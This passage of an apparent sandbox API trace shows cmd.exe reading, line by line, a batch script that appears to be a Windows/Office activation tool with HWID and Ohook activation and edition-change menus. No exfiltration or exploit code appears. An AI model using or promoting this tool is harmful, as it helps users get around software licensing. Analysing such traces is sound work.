lpMultiByteStr="if %_erl%==2 setlocal & call :OhookActivation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==2 setlocal & call :OhookActivation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.480] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==1 setlocal & call :HWIDActivation & cls & endlocal & goto :MainMenu\r\n", cbMultiByte=83, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==1 setlocal & call :HWIDActivation & cls & endlocal & goto :MainMenu\r\n") returned 83 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.480] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.480] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto :MainMenu\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto :MainMenu\r\nlocal & call :HWIDActivation & cls & endlocal & goto :MainMenu\r\n") returned 16 [0176.480] GetFileType (hFile=0xac) returned 0x1 [0176.481] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nto :MainMenu\r\n") returned 2 [0176.481] GetFileType (hFile=0xac) returned 0x1 [0176.481] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.481] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.481] GetFileType (hFile=0xac) returned 0x1 [0176.481] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.481] GetFileType (hFile=0xac) returned 0x1 [0176.481] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extras\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extras\r\n=================================================================================================================================\r\n") returned 9 [0176.481] _wcsicmp (_String1="_colorprep", _String2="Extras") returned -6 [0176.481] GetFileType (hFile=0xac) returned 0x1 [0176.481] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtras\r\n") returned 2 [0176.481] GetFileType (hFile=0xac) returned 0x1 [0176.481] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nas\r\n") returned 5 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Extras\r\n", cbMultiByte=15, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Extras\r\n===========================================================================================================================\r\n") returned 15 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 76, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 76, 30\r\n\r\n") returned 13 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n, 30\r\n") returned 7 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.482] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.482] GetFileType (hFile=0xac) returned 0x1 [0176.482] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n") returned 7 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.483] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ______________________________________________________________\r\n==============================================================\r\n") returned 76 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.483] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n") returned 7 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.483] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [1] Change Windows Edition\r\n", cbMultiByte=46, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [1] Change Windows Edition\r\n____________________________\r\n") returned 46 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.483] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [1] Change Windows Edition\r\n") returned 7 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.483] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [2] Extract $OEM$ Folder\r\n", cbMultiByte=44, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [2] Extract $OEM$ Folder\r\n\r\n") returned 44 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.483] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.483] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [2] Extract $OEM$ Folder\r\n") returned 7 [0176.483] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [3] Activation Status [vbs]\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [3] Activation Status [vbs]\r\n___________________________\r\n") returned 47 [0176.484] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n [3] Activation Status [vbs]\r\n") returned 7 [0176.484] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [4] Download Genuine Windows / Office\r\n", cbMultiByte=57, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [4] Download Genuine Windows / Office\r\n_________________\r\n") returned 57 [0176.484] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: __________________________________________________ \r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: __________________________________________________ \r\n") returned 76 [0176.484] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: \r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: \r\n") returned 76 [0176.484] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: [0] Go to Main Menu\r\n", cbMultiByte=39, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: [0] Go to Main Menu\r\n \r\n") returned 39 [0176.484] GetFileType (hFile=0xac) returned 0x1 [0176.484] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.484] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo: ______________________________________________________________\r\n", cbMultiByte=76, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo: ______________________________________________________________\r\n") returned 76 [0176.485] GetFileType (hFile=0xac) returned 0x1 [0176.485] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n") returned 7 [0176.485] GetFileType (hFile=0xac) returned 0x1 [0176.485] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n", cbMultiByte=99, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n=======================================\r\n") returned 99 [0176.485] GetFileType (hFile=0xac) returned 0x1 [0176.485] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:12340 /N\r\n", cbMultiByte=20, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="choice /C:12340 /N\r\ne% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n") returned 20 [0176.485] GetFileType (hFile=0xac) returned 0x1 [0176.485] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _erl=%errorlevel%\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _erl=%errorlevel%\r\n\" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n") returned 23 [0176.485] GetFileType (hFile=0xac) returned 0x1 [0176.485] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.485] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _erl=%errorlevel%\r\n") returned 2 [0176.485] GetFileType (hFile=0xac) returned 0x1 [0176.485] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==5 goto :MainMenu\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==5 goto :MainMenu\r\n \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n") returned 29 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.486] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==4 start %mas%genuine-installation-media.html & goto :Extras\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==4 start %mas%genuine-installation-media.html & goto :Extras\r\ne Keyboard [1,2,3,4,0] :\"\r\n") returned 72 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.486] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==3 setlocal & call :_Check_Status_vbs & cls & endlocal & goto :Extras\r\n", cbMultiByte=81, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==3 setlocal & call :_Check_Status_vbs & cls & endlocal & goto :Extras\r\nd [1,2,3,4,0] :\"\r\n") returned 81 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.486] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==2 goto:Extract$OEM$\r\n", cbMultiByte=32, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==2 goto:Extract$OEM$\r\nheck_Status_vbs & cls & endlocal & goto :Extras\r\n") returned 32 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.486] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==1 setlocal & call :change_edition & cls & endlocal & goto :Extras\r\n", cbMultiByte=81, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==1 setlocal & call :change_edition & cls & endlocal & goto :Extras\r\n") returned 81 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.486] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto :Extras\r\n", cbMultiByte=14, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto :Extras\r\netlocal & call :change_edition & cls & endlocal & goto :Extras\r\n") returned 14 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.486] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.486] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nto :Extras\r\n") returned 2 [0176.486] GetFileType (hFile=0xac) returned 0x1 [0176.487] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.487] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.487] GetFileType (hFile=0xac) returned 0x1 [0176.487] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.487] GetFileType (hFile=0xac) returned 0x1 [0176.487] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extract$OEM$\r\n", cbMultiByte=15, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extract$OEM$\r\n===========================================================================================================================\r\n") returned 15 [0176.487] _wcsicmp (_String1="_colorprep", _String2="Extract$OEM$") returned -6 [0176.487] GetFileType (hFile=0xac) returned 0x1 [0176.487] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.487] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 